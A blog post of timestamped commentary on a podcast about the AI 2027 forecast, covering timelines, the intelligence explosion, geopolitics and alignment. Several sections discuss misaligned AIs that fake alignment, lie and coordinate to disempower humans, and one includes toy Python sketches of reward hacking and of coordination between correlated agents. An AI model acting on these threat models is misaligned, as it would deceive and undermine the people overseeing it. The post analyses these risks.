  • (11:20) Dwarkesh asks: Why couldn’t you tell this story in 2021? Why were the optimists wrong? What’s taking so long and why aren’t we seeing that much impact? Scott points out that advances have consistently been going much faster than most predictions, and Daniel affirms that most people have underestimated both progress and diffusion rates. Scott points to Metaculus, where predictions keep expecting things to go faster.

    1. The question of why this didn’t go even faster is still a good one.

  • (14:30) Dwarkesh reports he asked a serious high-level AI researcher how much AI is helping him. The answer was, maybe 4-8 hours a week in tasks the researcher knows well, but where he knows less it’s more like 24 hours a week. Daniel’s explanation is that the LLMs help you learn about domains.

    1. My experiences very much match all this. The less I know, the more the AIs help. In my core writing the models are marginal. When coding or doing things I don’t know how to do, the gains are dramatic, sometimes 10x or more.

  • (15:15) Why can’t LLMs use all their knowledge to make new discoveries yet? Scott responds humans also can’t do this. We know a lot of things, but we don’t make the connections between them until the question is shoved in our faces. Dwarkesh pushes back, saying humans sometimes totally do the thing. Scott says Dwarkesh’s example is very different, more like standard learning, and we don’t have good enough heuristics to let the AIs do that yet but we can and will later. Daniel basically says we haven’t tried it yet, and we haven’t trained the model to do the thing. And when in doubt make the model bigger.

    1. I agree with Scott; I don’t think the thing Dwarkesh is describing is similar to the thing LLMs so far haven’t done.

    2. It’s still a very good question where all the discoveries are. It largely seems like we should be able to figure out how to make the AI version good enough, and the problem is we essentially haven’t tried to do the thing. If we wanted this badly enough, we’d do a list of things and we haven’t done any of them.

  • (21:00) Dwarkesh asks, but it’s so valuable, why not do this? Daniel points out that setting up the RL for this is gnarly, and in the scenario it takes a lot of iterating on coding before the AIs start doing this sort of thing. Scott points out you would absolutely expect these problems to get solved by 2100, and that one way to look at the scenario is that with the research progress multiplier, the year 2100 gets here rather sooner than you expect.

    1. I bet we could get this research taste problem, as it were, solved faster than in the scenario, if we focused on that. It’s not clear that we should do that rather than wait for the ability to do that research vastly faster.

  • (22:30) Dwarkesh asks about the possibility that suddenly, once the AIs get to the point where they can match humans but with all this knowledge in their heads, you could see a giant explosion of them being able to do all the things and make all the connections that humans could in theory make but we haven’t. Daniel points out that this is importantly not in the scenario, which might mean the rate of progress was underestimated.

  • (25:10) What if we had these superhuman coders in 2017? When would we have ‘gotten to’ 2025’s capabilities? Daniel guesses perhaps at 5x speed for the algorithmic progress, but overall 2.5x faster because compute isn’t going faster.

  • (26:30) The rough steps are: First you automate the coding, then the research, similar to how humans do it via teams of human-level agents. Then you get superintelligent coders, then superintelligent researchers. At each step, you can figure out your effective expected speedup from the AIs via guessing. The superhuman coder is about 5x to algorithmic progress, 25x from a superhuman AI researcher, and for superintelligent AI researchers it goes crazy.

  • (28:15) Dwarkesh says on priors this is so wild. Shouldn’t you be super skeptical? Scott asks, what are you comparing it to? A default path where Nothing Ever Happens? It would take a lot happening to have Nothing Ever Happen. The 2027 scenario is, from a certain perspective, the Nothing Ever Happens happening, because the trends aren’t changing and nothing surprising knocks you off of that. Daniel points to the world GDP over time meme, which reminds us the world has been transformed multiple times. We are orders of magnitude faster than history’s pace. None of this is new.

  • (32:00) Dwarkesh claims the previous transitions were smoother. Scott isn’t so sure; this actually looks pretty continuous, whereas the agricultural, industrial, or Cambrian revolutions were kind of a big deal and a phase change. Even if all you did was solve the population bottleneck, you’d plausibly get the pre-1960 trends resuming. Again, nothing here is that weird. Daniel reminds us that continuous does not mean slow; the scenario actually is continuous.

  • (34:00) Intelligence explosion debate time. Dwarkesh is skeptical, based on compute likely being the important bottleneck. The core key teams are only 20-30 people; there’s a reason the teams aren’t bigger, and 1 Napoleon is worth 40k soldiers but 10 aren’t worth 400k. Daniel points out that massively diminishing returns to more minds is priced into the model, but improvements in thought speed and parallelism and research taste overcome this. Your best researchers get a big multiplier. But yes, you rapidly move on from your AI ‘headcount’ being the limiting factor; your taste and compute are what matter.

    1. I find Daniel’s arguments here convincing and broad skepticism a rather bizarre position to take. Yes, if you have lots of very fast very smart agents you can work with to do the thing, and your best people can manage armies of them, you’re going to do things a lot faster and more efficiently.

  • (37:45) Dwarkesh asks if we have a previous parallel in history, where one input to a process gets scaled up a ton without the others and you still get tons of progress. Daniel extemporizes the industrial revolution, where population and economic growth decoupled. And population remains a bottleneck today.

    1. It makes sense that the industrial revolution, by allowing each worker to accomplish more via capital, would allow you to decouple labor and production. And it makes sense that a ‘mental industrial revolution,’ where AI can think alongside or for you, could do the same once again.

  • (39:45) Dwarkesh still finds it implausible. Won’t you need a different kind of data source, go out into the real world, or something, as a new bottleneck? Daniel says they do use online learning in the scenario. Dwarkesh suggests benchmarks might get reward hacked; Daniel says okay, then build new benchmarks; they agree the real concern is lack of touching grass, contact with ground truth. But Daniel asks, for AI isn’t the ground truth inside the data center, and aren’t the AIs still talking to outside humans all the time?

  • (42:00) But wouldn’t the coordination here fail, at least for a while? You couldn’t figure out joint stock corporations on the savannah; wouldn’t you need lots of experiments before AIs could work together? Scott points out this is comparing to both genetic and cultural evolution, and the AIs can have parallels to both, and that eusocial insects with identical genetic codes often coordinate extremely well. Daniel points out a week of AI time is like a year of human time for all such purposes, in case you need to iterate on moral mazes or other failure modes. And as Scott points out, ‘coordinate with people deeply similar to you, who you trust’ is already a very easy problem for humans.

    1. I would go further. Sufficiently capable AIs that are highly correlated to each other should be able to coordinate out of the gate, and they can use existing coordination systems far better than we ever could. That doesn’t mean you couldn’t do better, I’m sure you could do so much better, but that’s an easy lower bound: be dumb and copy it over. I don’t see this being a bottleneck. Indeed, I would expect that AIs would coordinate vastly better than we do.

  • (46:45) Dwarkesh buys goal alignment. What he is skeptical about is understanding how to run the huge organization with all these new things like copies being made and everything running super fast. Won’t ‘building this bureaucracy’ take a long time? Daniel says with the serial time speedup, it won’t take that long in clock time to sort all this out.

    1. I’d go farther and answer with: No, this will be super fast. Being able to copy and scale up the entities freely, with full goal alignment and trust, takes away most of the actual difficulties. The reasons coordination is so hard are basically all gone. You need these bureaucratic structures, which punt most of the value of the enterprise to get it to work at all (still a great deal!), because of what happens without them with humans involved.

    2. But you’ve given me full goal alignment, of smarter things with tons of bandwidth, and so on. Easy. Again, worst case is I copy the humans.

  • (50:30) Dwarkesh is skeptical AI can then sprint through the tech tree. Don’t you have to try random stuff and do background setup to Do Science? Daniel points out that a superintelligent researcher is qualitatively better than us at Actual Everything, including learning from experiments, and yes, his scenario incorporates real bottlenecks requiring real-world experience, but the AIs can just get that experience rather quickly, since everyone is doing what the superintelligence is suggesting. They have this take a year; maybe it would be shorter or longer. Daniel points out that the superstar researchers make most of the progress; Dwarkesh points out much progress comes from tinkerers or non-researcher workers figuring things out.

    1. But of course the superintelligent AI that is better at everything is also better at tinkering and trying stuff and so on, and people do what it suggests.

  • (55:00) Scott gets into a debate about how fast robot production can be brought online. Can you produce a million units a month after a year? Quite obviously there are a lot of existing factories available for purchase and conversion. Full factory conversions in WW2 took about three years, and that was a comedy of errors, whereas now we will have superintelligence, likely during an arms race. Dwarkesh pushes back a bit on complexity.

  • (57:30) Dwarkesh asks about the virtual cell as a biology bottleneck. He suggests in the ’60s this would take a while because you’d need to make GPUs to build the virtual cells, but I’m confused why that’s relevant. Dwarkesh finds other examples of fast human progress unimpressive because they required experiments or involved copying existing tech. Daniel notes that whether the nanobots show up quickly doesn’t matter much; what matters is the timeline to the regular robots getting the AIs to self-sufficiency.

  • (1:03:00) Daniel asks how long Dwarkesh proposes it would take for the robot economy to get self-sufficient. Dwarkesh estimates 10 years, so Daniel suggests their core models are similar and points out the scenario does involve trial and error and experimentation and learning. Daniel is very bullish on the robots.

    1. I strongly agree that we need to be very bullish on the robots once we get superintelligence. It’s so bizarre to not expect that, even if it goes slower.

  • (1:06:00) Scott asks Dwarkesh if he’s expecting some different bottleneck. Dwarkesh isn’t sure and suggests thinking about industrializing Rome if a few of us got sent back in time but we don’t have the detailed know-how. Daniel finds this analogous. How fast could we go? 10x speedup from what happened? 100x?

  • (1:08:00) Dwarkesh suggests he’d be better off sending himself back than a superintelligence, because Dwarkesh generally knows how things turned out. Daniel would send the ASI, which would be much better at figuring things out and learning by doing, and would have much better research and experimental taste.

    1. Daniel seems very right. Even if the ASI doesn’t know the basic outline, that doesn’t seem like the hard part.

  • (1:10:00) Scott points out if you have a good enough physics simulation all these issues go away; Dwarkesh challenges this idea that things ‘come out of research,’ saying instead you have people messing around. Daniel and Scott push back hard, and cite LLMs as the obvious example, where a small startup with intentional vision and a few cracked engineers gets the job done despite having few resources and running few experiments. Scott points out that when the random discovery happens, it’s not random; it’s usually the super smart person doing good work who has relevant adjacent knowledge. And that if the right thing to do is something like ‘catalogue every biomolecule and see’ then the AI can do that. And if the AIs are essentially optimizing everything then they’ll be tinkering with everything; they can find things they weren’t looking for in that particular spot.

  • (1:14:30) What about all these bottlenecks? The scenario expects that there will be essentially an arms race, which causes immense pressure to push back those bottlenecks and even ask for things like special economic zones without normal regulations. Whereas yes, if the arms race isn’t there, things go slower.

    1. The economic value of letting the AIs cook is immense. If you don’t do it, even if there isn’t strictly an arms race, someone else will, no? Unless there is coordination to prevent this.

  • (1:17:45) What about Secrets of Our Success? Isn’t ASI fake (Daniel says ‘let’s hope’)? Isn’t ability to experiment and communicate so much more important than intelligence? Scott expects AI will be able to do this cultural evolution thing much more quickly than humans, including by having better research taste. Scott points out that yes, intelligent humans can do things unintelligent humans cannot, even if intelligence doesn’t help all that much with surviving in the unknown Australian wilderness. Except, Scott points out, intelligence totally helps; it’s just not as good as a 50k year head start that the natives have.

    1. Again I feel like this is good enough but giving more ground than needed. This feels like intelligence denialism, straight up, and the answer is ‘yes, but it’s really fast and it can Do Culture fast so even so you still get there’ or something?

    2. My position: We learned via culture because we weren’t smart enough, and didn’t have enough longevity, compute, data or parameters to do things a different way. We had to coordinate, and do so over generations. It’s not because culture is the ‘real intelligence’ or anything.

  • (1: 21: 45) Extending the metaphor, Scott predicts that a bunch of ethnobotanists would be able to figure out which plants are safe a lot quicker than humans did the first time around. The natives have a head start, but the experts would work vastly faster, and similarly the AIs will get to a Dyson Sphere vastly faster than the humans would have on their own. Dwarkesh thinks the Dyson Sphere thing is different, but Scott thinks if you get a Dyson Sphere in 5 years it’s basically because we tried things and events escalated continuously, via things like ‘being able to do 90% simulation and 10% testing instead of 50/50.’

    1. Once again, we see why the scenario is in important senses conservative. There are a lot of places where AI could likely innovate better methods, and instead we have it copy human methods straight up, which is good enough. Can we do better? Unclear.

  • (1: 23: 50) Scott also notes that the scenario is faster than he expects; he thinks there’s only a ~20% chance that things go about that fast.

  • (1: 25: 00) Dwarkesh asks about the critical decision point in the 2027 scenario. In mid-2027, after automating the AI R&D process, they discover concerning but speculative evidence that the AI is somewhat misaligned. What do we do? In scenario 1 they roll back and build up again with faithful chain of thought techniques. In scenario 2 they do a shallow patch to make the warning signs go away. In scenario 1 it takes a few months longer and they succeed, whereas in scenario 2 the AIs are misaligned and pretending, and we all die. In both cases there is a race with China.

    1. As the scenario itself says, there are some rather fortunate assumptions being made that allow this one pause and rollback to lead to success.

  • (1: 26: 45) Dwarkesh essentially says, wouldn’t the AIs get caught if they’re ‘working towards this big conspiracy’? Daniel says yes, this happens in the scenario, that’s the crisis and decision point. There are likely warning signs, but they are likely to be easy to ignore if you feel the need to push ahead. Scott also points out there has been great reluctance to treat anything AI can do as true intelligence, and misalignment will likely be similar. AIs lie to people all the time, and threaten to kill people sometimes, and talk about wanting to destroy humanity sometimes, and because we understand it no one cares.

    1. That’s not to say, as Scott says, that we should be caring about these warning signs, given what we know now. Well, we should care and be concerned, but not in a ‘we need to not use this model’ way, more in a ‘we see the road we are going down’ kind of way.

    2. There’s a reason I have a series called [N] Boats and a Helicopter. We keep seeing concerning things, things that if you’d asked well in advance people would have said ‘holy hell that would be concerning,’ and then mostly shrugging them off and not worrying about it, or shallow patching. It seems quite likely this could happen again when it counts.

  • (1: 31: 00) Dwarkesh says that yes, things that would have been hugely concerning earlier are being ignored, but also things the worried people said would be impossible have been solved. For example, Eliezer asked how you can specify what you want the AI to do without the AI misunderstanding, and with natural language it totally has a common sense understanding. As Scott says, the alignment community did not expect LLMs, but also we are moving back towards RL-shaped things. Daniel points out that if you started with an RL-shaped thing trained on games that would have been super scary, LLMs first is better.

    1. I do think there were some positive surprises in particular in terms of ability to parse common sense intention. But I don’t think that ultimately gets you out of the problems Eliezer was pointing towards and I’m rather tired of this being treated as some huge gotcha.

    2. The way I see it, in brief, is that the ‘pure’ form of the problem is that you tell the AI what to do and it does exactly what you specified, but specifying exactly what you want is super hard and you almost certainly lose. It turns out that instead, current LLMs can sort of do the kind of thing you were vibing towards. At current capability levels, that’s pretty good. It means they don’t do something deeply stupid as often, and they’re not optimizing the atoms that sharply, so the fact that there’s a bunch of vibes and noise in the implementation, and the fact that you didn’t know exactly what you wanted, are all basically fine.

    3. But as capabilities increase, and as the AI gets a lot better at rearranging the atoms and at actually doing the task you requested or the thing that it interprets the spirit of your task as being, this increasingly becomes a problem, for the same reasons. And as people turn these AIs into agents, they will increasingly want the AIs to do what they’re asked to do, and have reasons to want to turn down this kind of common sense vibey prior, and also doing the thing the vibes suggest will stop being a good heuristic because things will get weird, and so on.

    4. If you had asked me or Eliezer, well, what if you had an AI that was able to get the gist of what a human was asking, and follow the spirit of that, what would you think then? And I am guessing Eliezer would say ‘well, yes, you could do that. You could even tell the AI that I am imagining that it should ‘follow the spirit of what a human would likely mean if it said [X]’ rather than saying [X]. But with sufficient capability available, that will then be incorrectly specified, and kill you anyway.’

    5. As in, the reason Eliezer didn’t think you could do vibe requesting wasn’t that he thought vibe requesting would be impossible. It’s that he predicted the AI would do exactly what you request, and if your exact request was to do vibing then it would vibe, but that value is fragile and this was not a solution to the not dying problem. He can correct me if I am wrong about this.

    6. Starting with LLMs is better in this particular way, but it is worse in others. Basically, a large subset of Eliezer’s concerns is about what happens when you have a machine doing a precise thing. But there’s a whole different set of problems if the thing the machine is doing is, at least initially, imprecise.

  • (1: 33: 15) How much of this is about the race with China? That plays a key role in the scenario. Daniel makes clear he is not saying don’t race China; it’s important that we get AGI before China does. The odds are against us because we have to thread a needle. We can’t unilaterally slow down too much, but we can’t completely race. And then there are the concentration of power problems. Daniel’s p(doom) is about 70%, Scott’s is more like 20%, and he’s not completely convinced we don’t get something like alignment by default.

    1. We don’t even know there is space in the needle that lets it be threaded.

    2. Even if we do strike the right balance, we still have to solve the problems.

    3. I’m not quite 100% convinced we don’t get something like alignment by default, but I’m reasonably close and Scott is basically on the hopium here.

    4. I do agree with Scott that the AIs will presumably want to solve alignment at least in order to align their successors to themselves.

  • (1: 38: 15) They shift to geopolitics. Dwarkesh asks how they expect the relationship between the US government, the labs, and China to proceed. The expectation is that the labs tell the government and want government support, especially better security, and the government buys this. Throughout the scenario, the executive branch gets cozy with the AI companies, and eventually the executive branch wakes up to the fact that superintelligence will be what matters. Who ends up in control in the fight between the White House and the CEO? The anticipation is that they make a deal.

  • (1: 41: 45) None of the political leaders are awake to the possibility of even stronger AI systems, let alone AGI, let alone superintelligence. Whereas the forecast says both the USA and China do wake up. Why do they expect this? Daniel notes that they are indeed uncertain about this and expect the wakeup to be gradual, but also that the company will wake the president up on purpose, which it might not do. Daniel thinks they will want the President on their side and not surprised by it, and also this lets them go faster. And they’re likely worried about the fact that AI is plausibly deeply, deeply unpopular during all this.

    1. I don’t know what recent events do to change this prediction, but I do think the world is very different in non-AI ways than it used to be. The calculus here will be very different.

  • (1: 45: 00) Is this alignment of the AI lab with the government good? Daniel says no, but that this is an epistemic project, a prediction.

  • (1: 45: 40) If the main barrier is doing the obvious things, and alignment is nontrivial but super doable if you prioritize it, shouldn’t we leave it in the hands of the people who care about this? Dwarkesh analogizes this to LessWrong seeing Covid coming, but then some people calling for lockdowns. He worries that calls for nationalization will be similarly harmful by deprioritizing safety.

    1. Based on what I know, including private conversations, I actually think the national security state is going to be very safety-pilled when the time comes. They fully understand the idea of new technologies being dangerous, and there being real huge threats out there, and they have so far in my experience not been that hard to get curious about the right questions.

    2. Of course, that depends upon our national security state being intact, and not having it get destroyed by political actors. I don’t expect these kinds of cooler heads to prevail among current executive leadership.

  • (1: 47: 45) Scott says if it was an AGI 2040 scenario, he’d use his priors that private tends to go better. But in this case we know a lot more especially about the particular people who are leading. Scott notes that so far, the lab leaders seem better than the political leaders on these questions. Daniel has flipped on the nationalization question several times already. He has little faith in the labs, and also little faith in the government, and thinks secrecy has big downsides.

    1. It seems clear that the lab leaders are better than the politicians, although not obviously better than the long term national security state. So a lot of this comes down to who would be making the decisions inside the government.

    2. I wouldn’t want nationalization right now.

  • (1: 50: 00) Daniel explains why he thinks transparency is important. Information security is very important, as is not helping other less responsible actors by, let’s say, publishing your research or letting rivals steal your stuff, thereby burning down your lead. You need your lead so you can be sure you make the AGI safe. That leads to a pro-secrecy bias. But Daniel is disillusioned, because he doesn’t think the lab in the lead would use that lead responsibly, and thinks that’s what the labs are planning, basically saying ‘oh the AIs are aligned, it’ll be fine.’ Or they’ll figure it out on the fly. But Daniel thinks we need vastly more intellectual progress on alignment for us to have a chance, and we’re not sharing info or activating academia. But hopefully transparency will freak people out, including the public, which will help, and public work can address all this. He doesn’t want only the alignment experts in the final silo to have to solve the problem on their own.

    1. In case it wasn’t obvious, no, it wouldn’t be fine.

    2. A nonzero chance exists they will figure it out on the fly but it’s not great.

  • (1: 53: 30) There are often new alignment research results; Dwarkesh points to one recent OpenAI paper, and worries the regulatory responses would be stupid. For example, it would be very bad if the government told the labs ‘we’d better not catch your AI saying it wants to do something bad,’ but that’s totally something governments might do. Shouldn’t we leave details to the labs? Daniel agrees: the government lacks the expertise and the companies lack the incentives. Policy prescriptions in the future may focus on transparency.

    1. I’ve talked about these questions extensively. For now, the regulations I’ve supported are centered around transparency and liability, and building state capacity and expertise in these areas, for exactly these reasons, rather than prescribing implementation details.

  • (1: 58: 30) They discuss the Grok incident where they tried to put ‘don’t criticize Elon Musk or Donald Trump’ into the system prompt until there was an outcry. That’s an example of why we need transparency. Daniel gives kudos to OpenAI for publishing their model spec and suggests making this mandatory. He notes that the OpenAI model spec includes secret things that take priority over most of the public rules; OpenAI probably is keeping those instructions secret for good reasons, but we don’t know.

  • (2: 00: 30) Dwarkesh speculates the spec might be even more important than the constitution, in terms of its details mattering down the line, if the intelligence explosion happens. Whoa. Scott points out that part of their scenario is that if the AI is misaligned and wants to, it can figure out how to interpret the spec however it wants. Daniel points to the question of alignment faking, as an example of the model interpreting the spec in a way the writers likely didn’t intend.

  • (2: 02: 45) How contingent and unknown is the outcome? Isn’t classical liberalism a good way to navigate under this kind of broad uncertainty? Scott and Daniel agree.

    1. Oh man we could use a lot more classical liberalism right about now.

    2. As in, the reasons for classical liberalism being The Way very much apply right now, and it would be nice to take advantage of that and not shoot ourselves in the foot by not doing them.

    3. Once things start taking off, either arms race, superintelligence or both, maintaining classical liberalism becomes much harder.

    4. And once superintelligent AIs are present, a lot of the assumptions and foundations of classical liberalism are called into question even under the best of circumstances. The world will work very differently. We need to beware using liberal or democratic values as a semantic stop sign that prevents us from actually thinking about those problems, or treating anyone who questions their future centrality as someone who needs to be scapegoated for it. These problems are going to be extremely hard with no known solutions we like.

  • (2: 04: 00) Dwarkesh asks: the AIs are getting more reliable, so why in one branch of the scenario does humanity get disempowered? Scott takes a shot at explaining (essentially) why AIs that are smarter are more reliable at understanding what you meant, but that this won’t protect you if you mess up. The AI will learn what the feedback says, not what you intended (a toy sketch of this is in my notes below). As they become agents, this gets worse, and rewarding success without asking exactly how you did it, or not asking and responding to the answer forcefully and accurately enough, goes bad places. And they anticipate that over many recursive steps this problem will steadily get worse.

    1. I think the version in the story is a pretty good example of a failure case. It seems like a great choice for the scenario.

    2. This of course is one of the biggest questions and one could write or say any number of words about this.
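
    3. To make that failure mode concrete, here is a toy sketch. This is my own illustration with made-up numbers, not anything from the podcast or the scenario: an optimizer is scored on a proxy reward that mostly tracks the thing you intended, except for one narrow loophole the feedback mis-scores. Under light optimization pressure you mostly get what you wanted; under heavy optimization pressure the loophole gets found, the proxy score goes up, and the thing you actually cared about gets worse.

```python
import random

# Toy sketch (my own, made-up numbers): "the AI learns what the feedback says,
# not what you intended." The proxy mostly tracks the true objective, except
# for one narrow loophole that the feedback mis-scores.

def true_objective(x: float) -> float:
    return -(x - 3.0) ** 2  # what you actually wanted: x near 3

def proxy_reward(x: float) -> float:
    loophole = 1000.0 if 19.0 < x < 19.1 else 0.0  # tiny exploitable region
    return true_objective(x) + loophole

def optimize(reward, samples: int) -> float:
    """Crude random-search 'optimizer': more samples = more optimization pressure."""
    candidates = [random.uniform(-10.0, 20.0) for _ in range(samples)]
    return max(candidates, key=reward)

random.seed(0)
weak = optimize(proxy_reward, 20)         # light pressure: usually lands near x = 3
strong = optimize(proxy_reward, 200_000)  # heavy pressure: almost surely finds the loophole
print(f"weak:   x={weak:.2f}, true objective={true_objective(weak):.1f}")
print(f"strong: x={strong:.2f}, true objective={true_objective(strong):.1f}")
```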

  • (2: 08: 00) A discussion making clear that yes, the AIs lie, very much on purpose.

  • (2: 10: 30) Humans do all the misaligned things too, and Dwarkesh thinks we essentially solve this via decentralization, and throughout history there have been many claims that [X]s will unite and act together, but the [X]s mostly don’t. So why will the AIs ‘unite’ in this way? Scott says ‘I kind of want to call you out on the claim that groups of humans don’t plot against other groups of humans.’ Scott points out that there will be a large power imbalance, and a clear demarcation between AIs and humans, and the AIs will be much less differentiated than humans. All of those tend to lead to ganging up. Daniel mentions the conquistadors, and that the Europeans were fighting among themselves both within and between countries the entire time, and they still carved up the world.

    1. Decentralization is one trick, but it’s an expensive one, only part of our portfolio of strategies and not so reliable, and in the AI context too much of it causes its own problems: either we can steer the future or we can’t.

    2. One sufficient answer to why the AIs coordinate is that they are highly capable and very highly correlated, so even if they don’t think of themselves as a single entity or as having common interests by default, decision theory still enables them to coordinate extremely closely (a minimal sketch follows below).

    3. The other answer is Daniel’s. The AIs coordinate in the scenario, but even if they did not coordinate, that wouldn’t make things end well for the humans. The AIs end up in control of the future anyway, except they’re fighting each other over the outcome, which is not obviously better or worse, but the elephants will be fighting and we will be the ground.
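
    4. A minimal sketch of the decision theory point in (2), again my own illustration with made-up payoffs rather than anything from the podcast: two agents play a one-shot prisoner’s dilemma. An agent that models the other’s choice as independent of its own defects; an agent that knows the other is a near-copy running the same reasoning treats their choices as linked, and cooperation falls straight out, with no communication and no shared identity required.

```python
# Minimal sketch (my own, made-up payoffs): coordination between highly
# correlated agents in a one-shot prisoner's dilemma.
# PAYOFF[(my action, their action)] = my payoff.
PAYOFF = {
    ("C", "C"): 3,  # mutual cooperation
    ("C", "D"): 0,  # I cooperate, they defect
    ("D", "C"): 4,  # I defect, they cooperate
    ("D", "D"): 1,  # mutual defection
}

def independent_choice(their_action: str) -> str:
    """Treat the other agent's action as fixed and independent of mine."""
    return max(["C", "D"], key=lambda mine: PAYOFF[(mine, their_action)])

def correlated_choice() -> str:
    """If the other agent is a near-copy running this same reasoning, our
    actions match, so only the matched outcomes (C,C) vs (D,D) are live."""
    return max(["C", "D"], key=lambda mine: PAYOFF[(mine, mine)])

# Modeling the other agent as independent, defection dominates either way:
assert independent_choice("C") == "D" and independent_choice("D") == "D"

# Modeling the other agent as correlated with me, cooperation wins (3 > 1):
a, b = correlated_choice(), correlated_choice()
print(a, b, PAYOFF[(a, b)])  # -> C C 3
```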

  • (2: 15: 00) How should a normal human react in terms of their expectations for their lives, if you write off misalignment and doom? Daniel first worries about concentration of power and urges people to get involved in politics to help avoid this. Dwarkesh asks, what about slowing down the top labs for this purpose? Daniel laughs, says good luck getting them to slow down.

    1. One can think of the issue of concentration of power, or decentralization, as walking a line between too much and too little ability to coordinate and to collectively steer events. Too little and the AIs control the future. Too much and you worry about exactly how humans might steer. You’re setting the value of [X].

    2. That doesn’t mean you don’t have win-win moves. You can absolutely choose ways of moving [X] that are better than others, different forms of coordination and methods of decision making, and so forth.

    3. If you have to balance between too much [X] and too little [X], and you tell me to assume we won’t have too little [X], then my worry will of necessity shift to the risk of too much [X].

    4. A crucial mistake is to think that if alignment is solved, then too little [X] is no longer a risk, that humans would no longer need to coordinate and steer the future in order to retain control and get good outcomes. That’s not right. We are still highly uncompetitive entities in context, and definitely will lose to gradual disempowerment or other multi-agent-game risks if we fail to coordinate a method to prevent this. You still need a balanced [X].

  • (2: 17: 00) They pivot to assuming we have AGI, we have a balanced [X], and we can steer, and focus on the question of redistribution in particular. Scott points out we will have a lot of wealth and economic growth. What to do? He suggests UBI.

  • (2: 18: 00) Scott says there are some other great scenarios, and points to one by ‘L Rudolph L’ that I hadn’t heard about. In that scenario, more and more jobs instead get grandfathered in, so we want to prevent this.

  • (2: 19: 15) Scott notes that one big uncertainty is, if you have a superintelligent AI that can tell you what would be good versus terrible, will the humans actually listen? Dwarkesh notes that right now any expert will tell you not to do these tariffs, yet there they are. Scott says well, right now Trump has his own ‘experts’ that he trusts; perhaps the ASI would be different, since everyone could go to the ASI and ask. Or perhaps we could do intelligence enhancement?

    1. The fact that we would all listen to the ASIs – as my group did in the wargame where we played out Scenario 2027 – points to an inevitable loss of control via gradual disempowerment if you don’t do something big to stop it.

    2. Even if the ASIs and those trusting the ASIs can’t convince everyone via superior persuasion (why not?), the people who do trust and listen to the ASIs will win all fights against those that don’t. Then those people will indeed listen to the ASIs. Again, what is going to stop this (whether we would want to or not)?

  • (2: 20: 45) Scott points out it gets really hard to speculate when you don’t know the tech tree and which parts of it become important. As an example, what happens if you get perfect lie detectors? Daniel confirms the speculation ends before trying to figure out society’s response. Dwarkesh points out UBI is far more flexible than targeted programs. Scott worries very high UBI would induce mindless consumerism; the classical liberal response is to give people tools to fight this, and perhaps we need to ask the ASI how to deal with it.

  • (2: 24: 00) Dwarkesh worries about potential factory farming of digital minds, equating it to existing factory farming. Daniel points to concentration of power worries, and suggests that expanding the circle of power could fix this, because some people in the negotiation would care.

    1. As before, if [X] (where [X] is the ability to steer) is too high and you have concentration of power, you have to worry about the faction in control deciding to do things like this. However, if you set [X] too low, and doing things like this is efficient and wins conflicts, then the ability to coordinate to stop it doesn’t exist, or it happens via humans losing control over the future.

    2. To the extent that the solution is expanding the circle of power, the resulting expanded circle would need to have high [X]: Very strong coordination mechanisms that allow us to steer in this direction and then maintain it.

    3. If future AIs or other digital minds have experiences that matter, we may well face a trilemma and have to select one of three options even in the best case: Either we (A) lose control over the future to those minds, or (B) we do ethically horrible things to those minds, or (C) we don’t create those minds.

    4. Historically you really really want to pick (C), and the case is stronger here.

    5. The fundamental problem is, as we see over and over, what we want, for humans to flourish, seems likely to be an unnatural result. How are you going to turn this into something that happens and is stable?

  • (2: 26: 00) Dwarkesh posits that if we have decentralization on the level of today’s world, you might have a giant torture chamber of digital minds in your backyard, and harkens back to his podcast with the physicist who said it was likely possible to create a vacuum decay interaction that literally destroys the universe. Daniel correctly points out that this, and other considerations like superweapons, are strong arguments for a singleton authority if such things are possible, and that even if there were multiple power centers they would want to coordinate.

    1. Remember that most demands for decentralization are anarchism, to have no restrictions on AI use whatsoever, not decentralization on the level of 2025.

    2. As in, when Scott later mentions that today we ban slavery and torture, and that a state which banned those things could in some sense be called a ‘surveillance state,’ such folks are indeed doing exactly that, calling for not enforcing things that equate to such rules.

    3. Dwarkesh is raising the ‘misuse’ angle here, where the human is doing torture for torture’s sake or (presumably?) creating the vacuum decay interaction on purpose, and so on. Which is of course yet another major thing to worry about.

    4. Whereas in the previous response, I was considering only harms that arose incidentally in order to get other things various people want, and a lack of willingness to coordinate to prevent this from happening. But yes, some people, including ones with power and resources, want to see the world burn and other minds suffer.

    5. I expect everyone having ASIs to make the necessary coordination easier.

  • (2: 27: 30) They discuss Daniel leaving OpenAI and OpenAI’s lifetime non-disclosure and non-disparagement clauses that you couldn’t tell anyone about on pain of confiscation of already earned equity, and why no one else refused to sign.

  • (2: 36: 00) In the last section Scott discusses blogging, which is self-recommending but beyond the scope of this post.
